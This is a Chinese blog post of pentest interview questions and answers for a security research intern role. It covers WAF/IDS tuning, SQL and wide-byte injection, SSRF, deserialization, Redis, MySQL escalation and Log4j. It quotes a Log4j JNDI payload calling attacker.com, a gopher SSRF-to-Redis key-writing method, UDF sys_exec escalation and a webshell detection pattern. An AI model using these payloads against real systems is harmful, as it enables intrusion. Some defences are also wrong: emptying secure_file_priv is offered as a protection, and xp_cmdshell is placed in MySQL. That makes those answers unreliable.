2025年渗透测试面试题总结-字某某动-安全研究实习生(二面)(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 字某某动-安全研究实习生(二面)

1. 护网行动中的核心工作

2. 防护层级选择(WAF/IDS)

3. 误报治理方案

4. 内网误报分布场景

5. MySQL执行PowerShell防护

6. 资产收集经验

7. 漏洞攻击案例

8. SQL注入攻防详解

原理

防御方案

Order By防御

特殊字符处理

9. 宽字节注入原理

10. SSRF漏洞修复(Docker环境)

11. 反序列化漏洞解析

FastJSON

Shiro

12. 中间件与数据库漏洞

Redis未授权访问

MySQL提权

13. Log4j与JNDI攻击链

Log4j RCE原理

JNDI流程


 字某某动-安全研究实习生(二面)

护网中做了什么做哪一层处理,waf?ids?怎么解决误报过多的情况,有做过什么规则能解决这个情况的内网误报存在于办公网还是生产网比如mysql也会执行powershell,怎么做防护(前面说了内网误报是因为有人写了ps脚本触发的)在做攻防的时候,资产收集这块有没有什么经验介绍的一个单位的一级域名可能不止一个,怎么收集某个单位的所有域名,注意不是子域名资产收集的 经验除了信息收集,有没有什么漏洞方面的攻击案例sql注入的原理如何防御sql注入遇到order by如何防御遇到转义字符防御时,如果遇到数据库的列名或是表面本身就带有特殊字符时,应该怎么做宽字节注入的原理ssrf原理ssrf漏洞如何修复基于黑白名单的修复,现在的生产基本上都是用的docker ,ip是随时会变得,而且docker重启后可能什么都不一样了,怎么做一个修复fastjson反序列化原理redis漏洞mysql提权shiro 反序列化原理log4j漏洞原理jndi的解析流程和原理

1. 护网行动中的核心工作

  1. 监测与响应
    • 部署SIEM系统实时分析流量,结合EDR端点行为日志,对APT攻击链(如Cobalt Strike)进行深度追踪。
    • 建立威胁情报联动机制,对接微步、VirusTotal等平台,快速拦截恶意IP和域名。
  2. 资产暴露面收敛
    • 通过Shodan、FOFA等工具扫描暴露在公网的资产(如Redis、Kafka),关闭非必要端口。
    • 对云上对象存储(如AWS S3、OSS)设置最小化访问策略,防止数据泄露。
  3. 红蓝对抗演练
    • 模拟钓鱼邮件(如伪造OA登录页面)、横向渗透(利用MS17-010漏洞)等攻击手法,验证防御体系有效性。

2. 防护层级选择(WAF/IDS)

  1. WAF(Web应用层)
    • 防御SQL注入、XSS等OWASP Top 10漏洞,基于正则规则拦截union select等特征。
    • 动态脚本防护:拦截WebShell上传行为(如eval($_POST[cmd]))。
  2. IDS/IPS(网络层)
    • 检测内网横向移动:如SMB协议中的PsExec命令、Mimikatz特征流量。
    • 协议异常识别:如DNS隧道(长域名+Base64编码)、ICMP隐蔽通道。
  3. 混合部署策略
    • 边界部署云WAF(如阿里云盾),内网基于Suricata实现流量镜像分析。

3. 误报治理方案

  1. 规则优化
    • 白名单机制:对内部管理系统IP(如Jenkins、Zabbix)放行特定请求。
    • 误报样本训练:收集误报日志,使用机器学习模型(如随机森林)优化规则权重。
  2. 上下文关联
    • 结合用户身份(如VPN账号)与行为基线,区分正常运维操作与攻击。
    • 示例:办公网允许PowerShell调用API,但生产网触发告警。

4. 内网误报分布场景

  1. 办公网误报
    • 自动化脚本触发:如Ansible通过WinRM执行批量命令,被误判为恶意PowerShell。
    • 解决方案:在EDR中添加脚本签名白名单。
  2. 生产网误报
    • CI/CD流水线异常:如Docker构建过程中拉取镜像的HTTP请求含特殊字符(${})。
    • 解决方案:在WAF中配置构建工具User-Agent放行规则。

5. MySQL执行PowerShell防护

  1. 权限最小化
    • 禁止MySQL服务账号加入Administrators组,限制其仅拥有数据库操作权限。
  2. 审计与拦截
    • 启用MySQL审计插件,记录xp_cmdshellsys_exec等高危函数调用。
    • 在HIDS(如Osquery)中监控powershell.exe 进程的父进程是否为mysqld.exe

6. 资产收集经验

  1. 一级域名收集方法
    • 备案查询:通过工信部备案系统反查单位名称,获取所有关联域名。
    • SSL证书关联:使用Censys搜索同一组织签名的证书(Subject-O字段)。
    • ASN归属分析:通过IP段反向查询单位所属自治系统(ASN),提取注册域名。
  2. 隐蔽资产发现
    • DNS历史记录:利用SecurityTrails查找已过期但未注销的域名解析记录。
    • 子公司关联:通过企查查等工具获取控股公司名称,扩展搜索范围。

7. 漏洞攻击案例

  1. SSRF+Redis未授权访问
    • 利用gopher://协议构造Payload,通过SSRF向Redis发送flushallset命令,写入SSH公钥。
  2. Shiro反序列化
    • 硬编码AES密钥导致攻击者伪造RememberMe Cookie,触发URLClassLoader加载远程恶意类。
  3. FastJSON JNDI注入
    • 构造恶意JSON数据中的@type字段指向攻击者控制的LDAP服务,触发JdbcRowSetImpl漏洞。

8. SQL注入攻防详解

原理
  • 攻击者通过输入篡改SQL逻辑(如' OR 1=1 --),绕过认证或泄露数据。
防御方案
  1. 预编译语句(PDO)
    • 使用参数化查询确保输入数据仅作为字面值,而非SQL语法。
  2. 输入过滤
    • 正则表达式拦截'"--等敏感字符(如/[^\w\s]/)。
  3. 权限控制
    • 数据库账户仅授予最小权限(如禁用FILEEXECUTE)。
Order By防御
  • 将用户输入映射为固定字段名(如1=>id, 2=>name),避免直接拼接。
特殊字符处理
  • 对含特殊符号的列名使用反引号包裹(如`user-name`),并转义输入中的反引号。

9. 宽字节注入原理

  • 成因:数据库使用GBK编码时,%bf%5c会被解析为汉字“縗”,导致单引号逃逸。
  • 修复:统一使用UTF-8编码,并在PHP中设置mysql_set_charset('utf8')

10. SSRF漏洞修复(Docker环境)

  1. 服务发现机制
    • 通过Consul或Kubernetes Service动态获取内网服务IP,替代硬编码IP黑白名单。
  2. 协议限制
    • 禁用非常规协议(如file://gopher://),仅允许HTTP/HTTPS。
  3. 代理隔离
    • 强制所有出站流量经过代理网关,并在网关上实施请求目标校验。

11. 反序列化漏洞解析

FastJSON
  • 原理:autoType功能未严格校验类名,攻击者指定com.sun.rowset.JdbcRowSetImpl 触发JNDI注入。
  • 修复:升级至1.2.83+版本并启用safeMode
Shiro
  • 原理:硬编码AES密钥导致攻击者构造恶意序列化数据,触发AbstractPreferences类RCE。
  • 修复:随机生成新密钥并配置securityManager.rememberMe.cipherKey

12. 中间件与数据库漏洞

Redis未授权访问
  • 利用方式:通过CONFIG SET dir写入WebShell或SSH密钥。
  • 防御:启用requirepass密码认证,并限制CONFIG命令权限。
MySQL提权
  • UDF提权:上传恶意SO/DLL文件,调用sys_exec()执行系统命令。
  • 防御:设置secure_file_priv为空,禁止非授权目录写入。

13. Log4j与JNDI攻击链

Log4j RCE原理
  • 攻击者构造${jndi:ldap://attacker.com/Exploit} 日志内容,触发Log4j解析JNDI地址。
JNDI流程
  1. 受害机解析恶意LDAP地址,向攻击者服务器请求类文件。
  2. 攻击者返回包含静态代码块(static { ... })的恶意类文件。
  3. 类加载时自动执行静态代码块中的命令(如反弹Shell)。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/29768.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何记录日常笔记

如何使用Obsidian来记录日常的笔记吗?比如会议记录、读书笔记。 我认为,首先需要做好的就是建立一个单独的分类,比如设置会议记录的文件夹、读书笔记的文件夹,这样各个笔记相互不干扰。 而做日常记录,和我们进行卡…

软件信息安全性测试流程有哪些?专业软件测评服务机构分享

在数字化时代,软件信息安全性测试的重要性愈发凸显。尤其是对于企业来说,确保软件的安全性不仅是维护用户信任的关键,也是满足合规要求的必要条件。 软件信息安全性测试是指通过一系列系统化的测试手段,评估软件应用在受到攻击时…

UVC for USBCamera in Android

基于UVC 协议,完成USBCamera 开发 文章目录 一、目的:二、USBCamera 技术实现方案难点 三、误区:四、基础补充、资源参考架构图了解Camera相关专栏零散知识了解部分相机源码参考,学习API使用,梳理流程,偏应…

智慧社区解决方案介绍

1. 应用背景 智慧社区作为新经济时代的产物,利用互联网和物联网技术,改变了人们的生活方式,成为信息化、虚拟化新城市的重要组成部分。智慧社区的商业价值在于利用大数据技术对消费者进行细分,提供高附加值服务,预计零…

鸿蒙生态日日新,鸿蒙原生版支付宝下载量突破230万

鸿蒙生态日日新PLOG:鸿蒙原生版支付宝下载量突破230万,持续迭代性能提升15%,越来越好用;掌上生活、美柚等多款应用功能更新。

深度学习PyTorch之13种模型精度评估公式及调用方法

深度学习pytorch之22种损失函数数学公式和代码定义 深度学习pytorch之19种优化算法(optimizer)解析 深度学习pytorch之4种归一化方法(Normalization)原理公式解析和参数使用 深度学习pytorch之简单方法自定义9类卷积即插即用 实时…

显示器长时间黑屏

现象 电脑启动后,进入登录界面前会随机黑屏,有时候十几秒,有时候几分钟 进入桌面后,长时间不操作电脑黑屏,移动鼠标,点击键盘后尝试点亮屏幕,也会消耗较长时间 尝试 重装系统,或者重新安装显卡,都能够恢复,但过段时间以后又出现黑屏情况 集成显卡,独立显卡都出现过 操作系统…

网络编程之应用层协议(http)

HTTP: 1.url(统一资源定位符) 2.http:浏览器与服务器之间的通信标准 端口号:80; 传输层协议:TCP; 3.http工作流程: 4.http的报文格式: 5.HTTP请求报文的方法 6.回应报文:状态码 注意:

数据结构——顺序表与链表

1. 基础介绍 1、线性结构: 如果一个数据元素序列满足: (1)除第一个和最后一个数据元素外,每个数据元素只有一个前驱数据元素和一个后继数据元素; (2)第一个数据元素没有前驱数据…

苦瓜书盘官网,免费pdf/mobi电子书下载网站

苦瓜书盘(kgbook)是一个专注于提供6英寸PDF和MOBI格式电子书的免费下载平台,专为电子阅读器用户设计。该平台为用户提供了丰富的电子书资源,涵盖文学、历史、科学、技术等多个领域,旨在打造一个全面的电子书资源库。用…

PPT 小黑第20套

对应大猫21 Word转PPT 图片也得复制 题目要求两套PPT母板,应用不同版式(版式那就可以选) 竖排文字

第六课:数据库集成:MongoDB与Mongoose技术应用

本文详细介绍了如何在Node.js应用程序中集成MongoDB数据库,并使用Mongoose库进行数据操作。我们将涵盖MongoDB在Ubuntu 20系统中的安装、Bash命令的CRUD操作、Mongoose数据建模(Schema/Model)、关联查询与聚合管道,以及实战案例—…

蓝桥云客 卡牌

2.卡牌 - 蓝桥云课 卡牌 问题描述 这天,小明在整理他的卡牌。 他一共有n种卡牌,第i种卡牌上印有正整数i(i∈[1,n]),且第i种卡牌现有a_i张。 而如果有n张卡牌,其中每种卡牌各一张,那么这n张卡牌可以被称为一套牌。小…

【Linux】——初识操作系统

文章目录 冯-诺依曼体系结构操作系统shell 冯-诺依曼体系结构 我们现在所使用的计算机就是冯-诺依曼体系结构。 存储器就是内存。 由下图可知,寄存器最快,为啥不用寄存器呢? 因为越快价格就最贵,冯诺依曼体系结构的诞生&#xf…

坐标变换介绍与机器人九点标定的原理

【备注】本文的C#代码在下面链接中可以下载:Opencv的C#九点标定代码资源-CSDN文库 https://download.csdn.net/download/qq_34047402/90452336 一、坐标变换的介绍 1.绕原点旋转的坐标变换 一个点(x,y)绕原点旋转u度,其旋转后的坐标(x1,y1)如何计算? 2.绕任意点的坐标变…

恶劣天候三维目标检测论文列表整理

恶劣天候三维目标检测论文列表 图摘自Kradar 🏠 介绍 Hi,这是有关恶劣天气下三维目标检测的论文列表。主要是来源于近3年研究过程中认为有意义的文章。希望能为新入门的研究者提供一些帮助。 可能比较简陋,存在一定的遗漏,欢迎…

掌握Kubernetes Network Policy,构建安全的容器网络

在 Kubernetes 集群中,默认情况下,所有 Pod 之间都是可以相互通信的,这在某些场景下可能会带来安全隐患。为了实现更精细的网络访问控制,Kubernetes 提供了 Network Policy 机制。Network Policy 允许我们定义一组规则&#xff0c…

Mybatis集合嵌套查询,三级嵌套

三个表:房间 玩家 玩家信息 知识点:Mybatis中级联有关联(association)、集合(collection)、鉴别器(discriminator)三种。其中,association对应一对一关系、collectio…

字典树(trie树)详解

【本文概要】本文主要介绍了字典树的概念,字典树的一般算法,包括初始化,插入,查找等,最后举了比较典型的案例以及算法比赛中常见的“01树”来辅助理解字典树这种特殊的数据结构。 1、什么是字典树 字典树,是…

【html期末作业网页设计】

html期末作业网页设计 作者有话说项目功能介绍 网站结构完整代码网站样图 作者有话说 目前,我们的项目已经搭建了各页面的基本框架,但内容填充还不完善,各页面之间的跳转逻辑也还需要进一步优化。 我们深知,一个好的项目需要不断…